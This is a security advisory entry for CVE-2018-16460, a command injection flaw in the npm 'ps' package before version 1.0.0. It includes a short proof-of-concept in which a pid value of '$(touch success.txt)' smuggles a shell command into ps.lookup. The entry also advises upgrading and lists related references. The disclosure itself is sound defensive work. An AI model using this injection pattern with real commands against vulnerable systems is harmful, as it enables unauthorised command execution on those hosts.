Lucene search
GoogleOSV:GHSA-CFHG-9X44-78H2HistorySep 17, 2018 - 8:43 p.m.
ps Enables OS Command Injection
2018-09-1720:43:59
Google
osv.dev
11
0.003 Low
EPSS
Percentile
70.6%
Versions of ps before 1.0.0 are vulnerable to command injection.
Proof of concept:
var ps = require('ps');
ps.lookup({ pid: "$(touch success.txt)" }, function(err, proc) { // this method is vulnerable to command injection
if (err) {throw err;}
if (proc) {
console.log(proc); // Process name, something like "node" or "bash"
} else {
console.log('No such process');
}
});
// Result: The file success.txt will exist on the filesystem if the touch command was executed
Recommendation
Update to version 1.0.0 or later.
Related
prion
prion
Command injection
2018-09-07 18:29:00
cvelist
cvelist
CVE-2018-16460
2018-09-07 00:00:00
veracode
veracode
Command Injection
2018-09-10 10:31:10
osv
osv
CVE-2018-16460
2018-09-07 18:29:00
Command Injection in standard-version
2020-07-13 21:34:59
github
github
ps Enables OS Command Injection
2018-09-17 20:43:59
Command Injection in standard-version
2020-07-13 21:34:59
cve
cve
CVE-2018-16460
2018-09-07 18:29:00
nodejs
nodejs
Command Injection
2018-11-07 21:09:43
hackerone
hackerone
Node.js third-party modules: Command Injection is ps Package
2018-08-06 10:19:15
nvd
nvd
CVE-2018-16460
2018-09-07 18:29:00